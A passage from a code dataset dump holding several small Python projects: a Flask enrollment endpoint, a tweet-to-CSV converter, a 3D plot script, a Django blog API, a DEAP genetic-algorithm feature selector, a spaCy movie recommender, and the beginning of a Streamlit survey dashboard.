1.0,\n \"F\": 0.0,\n}\n\n\n@blueprint.route(\"/update_enrollment\", methods=[\"GET\", \"POST\"])\n@verify_session()\ndef update_enrollment() -> dict:\n \"\"\"\n API spec for `/student/update_enrollment`\n\n ```js\n {\n \"course_id\": int,\n \"cat_id\": int,\n \"term\": int,\n \"year\": int,\n \"grade\": \"A\" | \"B+\" | \"B\" | \"C+\" | \"C\" | \"D+\" | \"D\" | \"F\"\n }\n ```\n \"\"\"\n session: SessionContainer = g.supertokens\n user_id = session.get_user_id()\n cursor = db.cursor()\n\n query = \"SELECT student_id FROM student WHERE user_id = %s\"\n cursor.execute(query, [user_id])\n stu_id = cursor.fetchall()[0][0]\n\n if request.method == \"POST\":\n # remove existing data\n data = request.get_json()\n\n if data is None:\n return {\"status\": \"failed\", \"msg\": \"data cannot be null\"}\n\n if stu_id is None or not re.fullmatch(\"^[0-9]{9}$\", str(stu_id)):\n return {\n \"status\": \"failed\",\n \"msg\": \"Cannot recognize the current student number.\",\n }\n\n query = \"DELETE FROM enrollment WHERE student_id = %s\"\n cursor.execute(query, [stu_id])\n\n # add a new data\n if len(data) == 0:\n return {\n \"status\": \"success\",\n \"msg\": \"OK; no student enrollments of \"\n + stu_id\n + \" are in the database now.\",\n }\n\n query = (\n \"INSERT INTO enrollment (student_id, course_id, category_id, term, year, grade, grade_no) VALUES \"\n + \", \".join([\"(%s, %s, %s, %s, %s, %s, %s)\"] * len(data))\n )\n records = []\n\n for record in data:\n records.extend(\n (\n stu_id,\n record[\"course_id\"],\n record[\"cat_id\"],\n record[\"term\"],\n record[\"year\"],\n record[\"grade\"],\n _GRADE[record[\"grade\"]],\n )\n )\n\n cursor.execute(query, records)\n db.commit()\n\n return {\n \"status\": \"success\",\n \"msg\": \"OK\",\n }\n\n query = \"SELECT * FROM enrollment WHERE student_id = %s\"\n cursor.execute(query, [stu_id])\n cols = [i[0] for i in cursor.description]\n result = cursor.fetchall()\n\n return {\n \"status\": \"success\",\n \"msg\": \"OK\",\n \"data\": [\n {col: row[i] for i, col in enumerate(cols)} for row in result\n ],\n }\n", "repo_name": "Touutae-lab/FastGraduation-API", "sub_path": "fastgrad_api/student/update_enrollment.py", "file_name": "update_enrollment.py", "file_ext": "py", "file_size_in_byte": 3128, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Blueprint", "line_number": 9, "usage_type": "name"}, {"api_name": "typing.Final", "line_number": 11, "usage_type": "name"}, {"api_name": "typing.FrozenSet", "line_number": 11, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 21, "usage_type": "name"}, {"api_name": "supertokens_python.recipe.session.SessionContainer", "line_number": 49, "usage_type": "name"}, {"api_name": "flask.g.supertokens", "line_number": 49, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 49, "usage_type": "name"}, {"api_name": "database.db.cursor", "line_number": 51, "usage_type": "call"}, {"api_name": "database.db", "line_number": 51, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 57, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 57, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 59, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 59, "usage_type": "name"}, {"api_name": "mysql.connector.optionfiles.re.fullmatch", "line_number": 64, "usage_type": "call"}, {"api_name": "mysql.connector.optionfiles.re", "line_number": 64, "usage_type": "name"}, {"api_name": "database.db.commit", "line_number": 102, "usage_type": "call"}, {"api_name": "database.db", "line_number": 102, "usage_type": "name"}, {"api_name": "supertokens_python.recipe.session.framework.flask.verify_session", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "39203932081", "text": "#!/usr/bin/python3\n\nimport os\nimport glob\nimport time\nimport math\n\nimport pandas as pd\n\nfrom tqdm import tqdm\n\nTWEETS_DIR_JSON_PATH = '/Users/shlomi/Dropbox/Apps/file-saver'\nTWEETS_JSON_PATHS = glob.glob(os.path.join(TWEETS_DIR_JSON_PATH, '*-*-*.json'))\nTWEETS_JSON_PATHS.sort()\n\nN_JSONS_IN_CSV = 100\n\nN_JSONS_BLOCKS = int(math.ceil(len(TWEETS_JSON_PATHS)/N_JSONS_IN_CSV))\n\ndef main():\n timestamp = int(time.time())\n \n \n for i in tqdm(range(N_JSONS_BLOCKS)):\n tweets_jsons_paths_block = TWEETS_JSON_PATHS[i*N_JSONS_IN_CSV:(i+1)*N_JSONS_IN_CSV]\n \n unified_csv_path = os.path.join(\n TWEETS_DIR_JSON_PATH, 'tweets-{}-{}.csv'.format(timestamp, i))\n\n with open(unified_csv_path, 'w') as unified_file:\n unified_df = pd.concat(\n (pd.read_json(path) for path in tqdm(tweets_jsons_paths_block))\n )\n unified_df.to_csv(unified_file)\n\n \"\"\"\n header = True\n for tweets_json_path in tqdm(tweets_jsons_paths_block):\n single_tweets_df = pd.read_json(tweets_json_path)\n single_tweets_df.to_csv(unified_file, mode='a', header=header)\n header = False\n \"\"\"\n \nif __name__ == '__main__':\n main()", "repo_name": "kstrauch94/Crime-Prediction-with-Tweets", "sub_path": "backup/prepare_tweets_json.py", "file_name": "prepare_tweets_json.py", "file_ext": "py", "file_size_in_byte": 1273, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "glob.glob", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "math.ceil", "line_number": 18, "usage_type": "call"}, {"api_name": "time.time", "line_number": 21, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 31, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 32, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "73512961444", "text": "import matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n# чтение данных из файлов\ndata_file = 'dat/train.dat'\nclass_file = 'dat/classes.dat'\n\nwith open(data_file, 'r') as f:\n lines = f.readlines()\n data = []\n for line in lines:\n parts = line.strip().split()\n if len(parts) < 4:\n continue\n x, y, z = float(parts[0]), float(parts[1]), int(parts[-1])\n data.append((x, y, z))\n\nwith open(class_file, 'r') as f:\n lines = f.readlines()\n centers = {}\n for line in lines:\n parts = line.strip().split()\n if len(parts) < 4:\n continue\n center_x, center_y, center_z = float(parts[0]), float(parts[1]), int(parts[-1])\n centers[center_z] = (center_x, center_y)\n\n# разбивка данных на списки координат и меток классов\nxs = [d[0] for d in data]\nys = [d[1] for d in data]\nzs = [d[2] for d in data]\n\n# создание трехмерной фигуры\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\n\n# отображение точек данных\nax.scatter(xs, ys, zs, c=zs, marker='o')\n\n# отображение центров классов\nfor c in centers.keys():\n center_x, center_y = centers[c]\n ax.scatter(center_x, center_y, c, c='r', marker='x', s=300)\n\n# настройка осей и меток\nax.set_xlabel('X Label')\nax.set_ylabel('Y Label')\nax.set_zlabel('Class')\n\n# отображение графика\nplt.show()\n", "repo_name": "TheAntag0nist/AI_Labs", "sub_path": "bin/data_lab_1/graphic.py", "file_name": "graphic.py", "file_ext": "py", "file_size_in_byte": 1514, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}]} +{"seq_id": "13801864136", "text": "from django.shortcuts import render, get_object_or_404, HttpResponse\r\nfrom django.http import JsonResponse\r\nfrom django.views.decorators.csrf import csrf_protect, csrf_exempt\r\nfrom .models import Blog\r\n\r\n# Home View\r\ndef home(request):\r\n data = {\"Endpoints\": \"Below are the Endpoints for the usage of this API\", \r\n \"/getAll\": \"Returns all the Existing Objects from the Database\",\r\n \"/get/id\": \"Returns Specific Object based on the Id\", \r\n \"/drop/id\": \"Drops/Deletes Specific object from the Database\",\r\n \"/update\": \"Updates the Existing Post from the Database\",\r\n \"/insert\": \"Takes a POST request and inserts data into the Database\",\r\n \"/search?query=\": \"Returns Blogs based on the Searh Query\"}\r\n return JsonResponse(data)\r\n\r\n# Get All Objects from the Database\r\ndef getAll(request):\r\n all_blogs = Blog.objects.all()\r\n data = {\"results\": list(all_blogs.values(\"id\", \"author\", \"title\", \"content\", \"tags\"))}\r\n print(data)\r\n return JsonResponse(data)\r\n\r\n# Get Specific Objects from the Database\r\ndef get(request, id):\r\n blog = get_object_or_404(Blog, id=id)\r\n data = {\"results\": {\r\n \"id\": blog.id,\r\n \"author\": blog.author,\r\n \"title\": blog.title,\r\n \"content\": blog.content,\r\n }}\r\n return JsonResponse(data)\r\n \r\n# Insert / PUT data into the Database\r\n@csrf_exempt\r\ndef insert(request):\r\n if request.method == \"POST\":\r\n title = request.POST['title']\r\n author = request.POST['author']\r\n content = request.POST['content']\r\n if len(title) > 5 and len(author) > 2 and len(content) >3:\r\n blog = Blog(title=title, author=author, content=content)\r\n blog.save()\r\n return JsonResponse({\"Success\": \"Blog has been Added Successfully got the Data\"})\r\n else:\r\n return JsonResponse({\"Invalid Length\": \"Length of all the Fields must be greater than 5\"})\r\n \r\n else:\r\n return JsonResponse({\"Invalid Request Type\": \"Request Type POST Expected.\"})\r\n \r\n# Delete / Drop Specific Data\r\ndef drop(request, id):\r\n blog = get_object_or_404(Blog, id=id)\r\n if blog:\r\n blog.delete()\r\n return JsonResponse({\"Success\": f\"Data with the {id} was deleted Successfully\"})\r\n else:\r\n return JsonResponse({\"Failure\": \"Data with the Specific Id was not Found\"})\r\n\r\n# Searchs Through the Fields and Returns Blogs based on that \r\ndef search(request):\r\n query = request.GET['query']\r\n blog = Blog.objects.filter(title__icontains=query) or Blog.objects.filter(author__icontains=query) or Blog.objects.filter(content__icontains=query)\r\n data = {\"results\" : list(blog.values(\"id\", \"author\", \"title\", \"content\", \"tags\"))} \r\n return JsonResponse(data)\r\n\r\n \r\n@csrf_exempt\r\ndef update(request):\r\n\r\n if request.method == \"POST\":\r\n id = request.POST['id']\r\n title = request.POST['title']\r\n author = request.POST['author']\r\n content = request.POST['content']\r\n if len(title) > 5 and len(author) > 2 and len(content) >3:\r\n blog = Blog.objects.filter(id=id)\r\n blog.update(title=title, author=author, content=content)\r\n print(\"Udpated Successfully\")\r\n return JsonResponse({\"Success\": f\"Blog with id {id} has been Updated Successfully\"})\r\n else:\r\n return JsonResponse({\"Invalid Length\": \"Length of all the Fields must be greater than 5\"})\r\n \r\n else:\r\n return JsonResponse({\"Invalid Request Type\": \"Request Type POST Expected.\"})\r\n", "repo_name": "arkalsekar/Django-Blog-API", "sub_path": "home/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3574, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.http.JsonResponse", "line_number": 15, "usage_type": "call"}, {"api_name": "models.Blog.objects.all", "line_number": 19, "usage_type": "call"}, {"api_name": "models.Blog.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "models.Blog", "line_number": 19, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 22, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 26, "usage_type": "call"}, {"api_name": "models.Blog", "line_number": 26, "usage_type": "argument"}, {"api_name": "django.http.JsonResponse", "line_number": 33, "usage_type": "call"}, {"api_name": "models.Blog", "line_number": 43, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 45, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 47, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 50, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 36, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 54, "usage_type": "call"}, {"api_name": "models.Blog", "line_number": 54, "usage_type": "argument"}, {"api_name": "django.http.JsonResponse", "line_number": 57, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 59, "usage_type": "call"}, {"api_name": "models.Blog.objects.filter", "line_number": 64, "usage_type": "call"}, {"api_name": "models.Blog.objects", "line_number": 64, "usage_type": "attribute"}, {"api_name": "models.Blog", "line_number": 64, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 66, "usage_type": "call"}, {"api_name": "models.Blog.objects.filter", "line_number": 78, "usage_type": "call"}, {"api_name": "models.Blog.objects", "line_number": 78, "usage_type": "attribute"}, {"api_name": "models.Blog", "line_number": 78, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 81, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 83, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 86, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 69, "usage_type": "name"}]} +{"seq_id": "35589965502", "text": "# This file is part of DEAP.\n#\n# DEAP is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License as\n# published by the Free Software Foundation, either version 3 of\n# the License, or (at your option) any later version.\n#\n# DEAP is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with DEAP. If not, see .\n\n\n# example which maximizes the sum of a list of integers\n# each of which can be 0 or 1\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nimport random\nimport copy\nimport sys\nfrom deap import base\nfrom deap import creator\nfrom deap import tools\nfrom os import chdir\nfrom sklearn import svm\nimport scipy.io as sio\n#you can change the two parameters below to modify the number of samples and features\nglobal numofsamples\nglobal numoffeatures\nglobal numoftest\nnumgeneration=2000\nnumpopulation=1000\n#read the features of signals\nchdir('/Users/dingshilun/Documents/Junior/SRTP/srtp')\n\ndef loaddatafrommat(filename, matname):\n global numofsamples\n global numoffeatures\n global numoftest\n dat = sio.loadmat(filename)\n if(matname=='train'):\n numofsamples=dat[matname].shape[0]\n numoffeatures=dat[matname].shape[1]-1\n else:\n numoftest=dat[matname].shape[0]\n mat = {}\n mat['data'] = []\n mat['labels'] = []\n\n for row in dat[matname]:\n if row[0]==0:\n break\n tmp=[]\n for col in range(0,numoffeatures):\n tmp.append(row[col])\n mat['labels'].append(row[numoffeatures])\n mat['data'].append(tmp)\n return mat\n\nglobal emg\nglobal testS\n\nemg = loaddatafrommat('train_1_3_pca.mat', 'train')\ntestS = loaddatafrommat('test_1_3_pca.mat', 'test')#test samples\n\ncreator.create(\"FitnessMax\", base.Fitness, weights=(1.0,))\ncreator.create(\"Individual\", list, fitness=creator.FitnessMax)\n\ntoolbox = base.Toolbox()\n\n# Attribute generator\n# define 'attr_bool' to be an attribute ('gene')\n# which corresponds to integers sampled uniformly\n# from the range [0,1] (i.e. 0 or 1 with equal\n# probability)\ntoolbox.register(\"attr_bool\", random.randint, 0, 1)\n\n# Structure initializers\n# define 'individual' to be an individual\n# consisting of 100 'attr_bool' elements ('genes')\ntoolbox.register(\"individual\", tools.initRepeat, creator.Individual,\n toolbox.attr_bool, numoffeatures)\n\n# define the population to be a list of individuals\ntoolbox.register(\"population\", tools.initRepeat, list, toolbox.individual)\n\n# the goal ('fitness') function to be maximized\ndef evalOneMax(individual):\n ans=0;\n feat=copy.deepcopy(emg)\n test=copy.deepcopy(testS)\n itemi=0\n for itemi in range(0,numofsamples):\n feat['data'][itemi]=[]\n for it in range(0,numoffeatures):\n if (individual[it]):\n #print(it)\n #print(\"labels\",emg['labels'][it])\n #print(itemi)\n temp=emg['data'][itemi][it]\n #print(temp)\n feat['data'][itemi].append(temp)\n #feat['data'][itemi].reshape(-1,1);\n #feat['labels'].append(emg['labels'][itemi])\n #print(feat['data'][0])\n #print(emg['data'][0][0])\n# print(feat['data'])\n for itemi in range(0,numoftest):\n test['data'][itemi]=[]\n for it in range(0,numoffeatures):\n if (individual[it]):\n #print(it)\n #print(\"labels\",emg['labels'][it])\n #print(itemi)\n temp=testS['data'][itemi][it]\n #print(temp)\n test['data'][itemi].append(temp)\n\n reg = svm.SVC(kernel='rbf')\n\n reg.fit(feat['data'], feat['labels'])\n count=0\n for i in range(0, numoftest):\n #print reg.predict(feat['data'][i])\n if (reg.predict(test['data'][i])==test['labels'][i]):\n count+=1\n\n #print(feat['labels'][1])\n #calculate the fitness to decide if the individual is suitable for the next generation\n return count,\n\n#----------\n# Operator registration\n#----------\n# register the goal / fitness function\ntoolbox.register(\"evaluate\", evalOneMax)\n\n# register the crossover operator\ntoolbox.register(\"mate\", tools.cxTwoPoint)\n\n# register a mutation operator with a probability to\n# flip each attribute/gene of 0.05\ntoolbox.register(\"mutate\", tools.mutFlipBit, indpb=0.05)\n\n# operator for selecting individuals for breeding the next\n# generation: each individual of the current generation\n# is replaced by the 'fittest' (best) of three individuals\n# drawn randomly from the current generation.\ntoolbox.register(\"select\", tools.selTournament, tournsize=3)\n\n#----------\n\ndef main(argv):\n global emg\n global testS\n emg = loaddatafrommat(argv[1], 'train')\n testS = loaddatafrommat(argv[2], 'test') # test samples\n random.seed(64)\n\n # create an initial population of 300 individuals (where\n # each individual is a list of integers)\n pop = toolbox.population(n=numpopulation)\n\n # CXPB is the probability with which two individuals\n # are crossed\n #\n # MUTPB is the probability for mutating an individual\n #\n # NGEN is the number of generations for which the\n # evolution runs\n CXPB, MUTPB, NGEN = 0.5, 0.2, numgeneration\n\n print(\"Start of evolution\")\n\n # Evaluate the entire population\n fitnesses = list(map(toolbox.evaluate, pop))\n for ind, fit in zip(pop, fitnesses):\n ind.fitness.values = fit\n\n print(\" Evaluated %i individuals\" % len(pop))\n\n # Begin the evolution\n for g in range(NGEN):\n print(\"-- Generation %i --\" % g)\n\n # Select the next generation individuals\n offspring = toolbox.select(pop, len(pop))\n # Clone the selected individuals\n offspring = list(map(toolbox.clone, offspring))\n\n # Apply crossover and mutation on the offspring\n for child1, child2 in zip(offspring[::2], offspring[1::2]):\n\n # cross two individuals with probability CXPB\n if random.random() < CXPB:\n toolbox.mate(child1, child2)\n\n # fitness values of the children\n # must be recalculated later\n del child1.fitness.values\n del child2.fitness.values\n\n for mutant in offspring:\n\n # mutate an individual with probability MUTPB\n if random.random() < MUTPB:\n toolbox.mutate(mutant)\n del mutant.fitness.values\n\n # Evaluate the individuals with an invalid fitness\n invalid_ind = [ind for ind in offspring if not ind.fitness.valid]\n fitnesses = map(toolbox.evaluate, invalid_ind)\n for ind, fit in zip(invalid_ind, fitnesses):\n ind.fitness.values = fit\n\n print(\" Evaluated %i individuals\" % len(invalid_ind))\n\n # The population is entirely replaced by the offspring\n pop[:] = offspring\n\n # Gather all the fitnesses in one list and print the stats\n fits = [ind.fitness.values[0] for ind in pop]\n\n length = len(pop)\n mean = sum(fits) / length\n sum2 = sum(x*x for x in fits)\n std = abs(sum2 / length - mean**2)**0.5\n\n print(\" Min %s\" % min(fits))\n print(\" Max %s\" % max(fits))\n print(\" Avg %s\" % mean)\n print(\" Std %s\" % std)\n\n print(\"-- End of (successful) evolution --\")\n\n best_ind = tools.selBest(pop, 1)[0]\n print(\"Best individual is %s, %s\" % (best_ind, best_ind.fitness.values))\n\nif __name__ == \"__main__\":\n main(sys.argv)\n", "repo_name": "lucas95123/SRTP_Emotion_Recognization", "sub_path": "Feature Selection/genetic_algorithm_feature_selection.py", "file_name": "genetic_algorithm_feature_selection.py", "file_ext": "py", "file_size_in_byte": 7921, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "warnings.filterwarnings", "line_number": 20, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 38, "usage_type": "call"}, {"api_name": "scipy.io.loadmat", "line_number": 44, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 44, "usage_type": "name"}, {"api_name": "deap.creator.create", "line_number": 70, "usage_type": "call"}, {"api_name": "deap.creator", "line_number": 70, "usage_type": "name"}, {"api_name": "deap.base.Fitness", "line_number": 70, "usage_type": "attribute"}, {"api_name": "deap.base", "line_number": 70, "usage_type": "name"}, {"api_name": "deap.creator.create", "line_number": 71, "usage_type": "call"}, {"api_name": "deap.creator", "line_number": 71, "usage_type": "name"}, {"api_name": "deap.creator.FitnessMax", "line_number": 71, "usage_type": "attribute"}, {"api_name": "deap.base.Toolbox", "line_number": 73, "usage_type": "call"}, {"api_name": "deap.base", "line_number": 73, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 80, "usage_type": "attribute"}, {"api_name": "deap.tools.initRepeat", "line_number": 85, "usage_type": "attribute"}, {"api_name": "deap.tools", "line_number": 85, "usage_type": "name"}, {"api_name": "deap.creator.Individual", "line_number": 85, "usage_type": "attribute"}, {"api_name": "deap.creator", "line_number": 85, "usage_type": "name"}, {"api_name": "deap.tools.initRepeat", "line_number": 89, "usage_type": "attribute"}, {"api_name": "deap.tools", "line_number": 89, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 94, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 95, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 123, "usage_type": "call"}, {"api_name": "sklearn.svm", "line_number": 123, "usage_type": "name"}, {"api_name": "deap.tools.cxTwoPoint", "line_number": 143, "usage_type": "attribute"}, {"api_name": "deap.tools", "line_number": 143, "usage_type": "name"}, {"api_name": "deap.tools.mutFlipBit", "line_number": 147, "usage_type": "attribute"}, {"api_name": "deap.tools", "line_number": 147, "usage_type": "name"}, {"api_name": "deap.tools.selTournament", "line_number": 153, "usage_type": "attribute"}, {"api_name": "deap.tools", "line_number": 153, "usage_type": "name"}, {"api_name": "random.seed", "line_number": 162, "usage_type": "call"}, {"api_name": "random.random", "line_number": 199, "usage_type": "call"}, {"api_name": "random.random", "line_number": 210, "usage_type": "call"}, {"api_name": "deap.tools.selBest", "line_number": 240, "usage_type": "call"}, {"api_name": "deap.tools", "line_number": 240, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 244, "usage_type": "attribute"}]} +{"seq_id": "11119153952", "text": "# import spacy module and load en_core_web_md\nimport spacy\nnlp = spacy.load('en_core_web_md')\n\n# create f_movies variable to contain file - set as value None\nf_movies = None\n# try to open movies.txt to read\ntry:\n f_movies = open(\"movies.txt\", \"r\")\n\n # create empty list for movie descriptions\n movies = []\n\n # add each line to movies list after removal of \"\\n\"\n for line in f_movies:\n line_update = line.replace(\"\\n\", \"\")\n movies.append(line_update)\n# except statement in case file not found.\nexcept FileNotFoundError:\n print(\"The movies.txt file cannot be found.\")\n# finally once data read, close file.\nfinally:\n if f_movies is not None:\n f_movies.close()\n\n# dictionary variable created with one entry, key as movie name \nuser_watched_movie_list = [\"Planet Hulk\"]\nuser_watched_desc_list = [\"\"\"Will he save their world or destroy it? When the Hulk becomes too dangerous for the Earth, \nthe Illuminati trick Hulk into a shuttle and launch him into space to a planet where the Hulk can live in peace. \nUnfortunately, Hulk land on the planet Sakaar where he is sold into slavery and trained as a gladiator.\"\"\"]\n\n# variable created to contain index for movie being compared - with only one movie in above lists index is 0.\nmovie_comparison = 0\n\n# nlp description from desc_list using movie_comparison\nnlp_user_movie = nlp(user_watched_desc_list[movie_comparison])\n\n# create two empty lists to contain the movie name for each movie in \"movies\" list and similarity to user movie.\nmovie_names = []\nmovie_similarity = []\n# for loop through each movie description to extract required info for each movie and nlp for each movie description\nfor item in movies:\n movie_name = item[0:7]\n movie_desc = item[9::]\n\n nlp_movie_desc = nlp(movie_desc)\n\n # similarity value compared against nlp_user_movie and data appended to movie_names list and movie_similarity list.\n similarity_with_movie = nlp_user_movie.similarity(nlp_movie_desc)\n\n movie_names.append(movie_name)\n movie_similarity.append(similarity_with_movie)\n \n\n# creation of variable to track index of value of highest similarity\nhighest_similarity_index = 0\n\n# for range of len movie_similarity\nfor index in range(len(movie_similarity)):\n # if movie_similarity is more than similarity of highest_similarity_index replace highest_similarity_indext with index and less than 1\n # less than 1 included here as a value of 1 would mean identical and so to avoid recommending the same movie.\n if movie_similarity[index] > movie_similarity[highest_similarity_index]:\n highest_similarity_index = index\n\n# match percent calculation\nmovie_perc = round((movie_similarity[highest_similarity_index]*100))\n\n# final print statement to indicate recommended movie using highest_similarity_index with movie_names list.\nprint(f\"\\nBased on your recently watched movie \\\"{user_watched_movie_list[movie_comparison]}\\\", your recommended movie is \\\"{movie_names[highest_similarity_index]}\\\" with a match of {movie_perc}%.\\n\")", "repo_name": "Hemal91/movies_rec", "sub_path": "watch_next.py", "file_name": "watch_next.py", "file_ext": "py", "file_size_in_byte": 3024, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "spacy.load", "line_number": 3, "usage_type": "call"}]} +{"seq_id": "33973832415", "text": "## Survey Summary\n\n## Library Imports\nimport streamlit as st\nfrom PIL import Image\nimport numpy as np\nimport plotly.express as px\nimport plotly.figure_factory as ff\nimport plotly.graph_objects as go\n\nfrom data_sources import google_sheets\nfrom src import feedback_lib, summary_lib\nfrom src.resources import colour_palette\nfrom src.util import add_footer\nfrom plotly.subplots import make_subplots\n\n## Outline\n# 1: Headline\n# 2: Summary statement\n# 3: How many people responded\n# 4: Average feedback scores in each area\n# 5: Main topics identified from feedback text\n# 5: Buildings - Average Feedback Score\n# 6: Breakdown for each building\n\n# Global Variables\ntheme_plotly = None # None or streamlit\n\n# Layout\nst.set_page_config(page_title='RIGRA Survey', layout='wide')\n\n# Data Sources\ndf_summary = google_sheets.load_summary_data()\ndf_feedback = google_sheets.load_feedback_data()\ndf_mapping = df_feedback[['question_category','question']].drop_duplicates()\n\n## Topics\ndf_topics = google_sheets.load_topic_data()\n\n## Data Sources - Add colour column to feedback\nvalues = ['red', 'blue', 'green']\n\n# RIGRA logo\nlogo_rigra = Image.open('./images/rigra_logo.png')\nimage_col1, image_col2, image_col3 = st.columns(3)\nwith image_col1:\n st.write(' ')\nwith image_col2:\n st.image(logo_rigra)\nwith image_col3:\n st.write(' ')\n \ndef create_colour_conditions(df_colour):\n values = ['#FF0000', '#0000FF', '#00FF00']\n conditions_filtered = [\n (df_colour['feedback_score'] <= 3),\n (df_colour['feedback_score'] > 3) & (df_colour['feedback_score'] <= 4),\n (df_colour['feedback_score'] > 4),\n ]\n df_colour['feedback_colour'] = np.select(conditions_filtered, values)\n return df_colour\n\n# Title\nst.title('Survey Summary')\n\n## Header\n\n## Summary\nst.markdown(\n '''\n The survey consisted of 8 categories of questions, with options to rate each question from 1 (worst) to 5 (best). \n \n The average feedback across all questions was **3.4** out of 5.\n \n The majority of the feedback received was **neutral** (score of 3 or 4). There was more negative (1-3) than positive (5) feedback. \n \n The survey results show that the questions on **Communal Areas** and **R&R Satisfaction - Facilities** had the most negative feedback.\n '''\n)\nst.write('')\nst.write('')\n\nst.markdown('---')\n\n## Survey Responses Overview\nst.subheader(\"Survey Responses Overview\")\nst_col_01, st_col_02, st_col_03, st_col_04, st_col_05 = st.columns(5)\nst_col_01.metric(\"All Responses\", summary_lib.metric_residents_all(df_summary))\nst_col_02.metric(\n \"Contactable Responses\", summary_lib.metric_residents_contactable(df_summary)\n)\nst_col_03.metric(\n \"Leaseholders\", f\"{summary_lib.metric_residents_leaseholder(df_summary)}%\"\n)\nst_col_04.metric(\"Non-resident Leaseholders\", f\"{summary_lib.metric_residents_nonresident_leaseholder(df_summary)}%\")\nst_col_05.metric(\"Tenants\", f\"{summary_lib.metric_residents_tenant(df_summary)}%\")\nst.write('')\nbc_01, bc_02 = st.columns(2)\n\nwith bc_01:\n fig = px.bar(\n summary_lib.filter_summary_data(df_summary, \"resident_type\"),\n x=\"Description\",\n y=\"Number\",\n title=\"Resident Type\",\n log_y=False,\n )\n fig.update_layout(\n showlegend=False,\n xaxis_title=None,\n yaxis_title=\"Number of Responses\",\n xaxis={\"categoryorder\": \"category ascending\"},\n plot_bgcolor=colour_palette['background'],\n )\n fig.update_xaxes(showgrid = False)\n fig.update_yaxes(showgrid = False)\n st.plotly_chart(fig, use_container_width=True, theme=theme_plotly)\n\n fig = px.bar(\n summary_lib.filter_summary_data(df_summary, \"building_name\"),\n x=\"Description\",\n y=\"Number\",\n title=\"Building Name\",\n log_y=False,\n )\n fig.update_layout(\n showlegend=False,\n xaxis_title=None,\n yaxis_title=\"Number of Responses\",\n xaxis={\"categoryorder\": \"category ascending\"},\n plot_bgcolor=colour_palette['background'],\n )\n fig.update_xaxes(showgrid = False)\n fig.update_yaxes(showgrid = False)\n st.plotly_chart(fig, use_container_width=True, theme=theme_plotly)\n \nwith bc_02:\n\n fig = px.bar(\n summary_lib.filter_summary_data(df_summary, \"resident_length\"),\n x=\"Description\",\n y=\"Number\",\n title=\"Resident Length\",\n log_y=False,\n )\n fig.update_layout(\n showlegend=False,\n xaxis_title=None,\n yaxis_title=\"Number of Responses\",\n xaxis={\"categoryorder\": \"category ascending\"},\n plot_bgcolor=colour_palette['background'],\n )\n fig.update_xaxes(showgrid = False)\n fig.update_yaxes(showgrid = False)\n st.plotly_chart(fig, use_container_width=True, theme=theme_plotly)\nst.write()\n\n\n## Feedback Overview\nst.markdown('---')\nst.subheader(\"Feedback 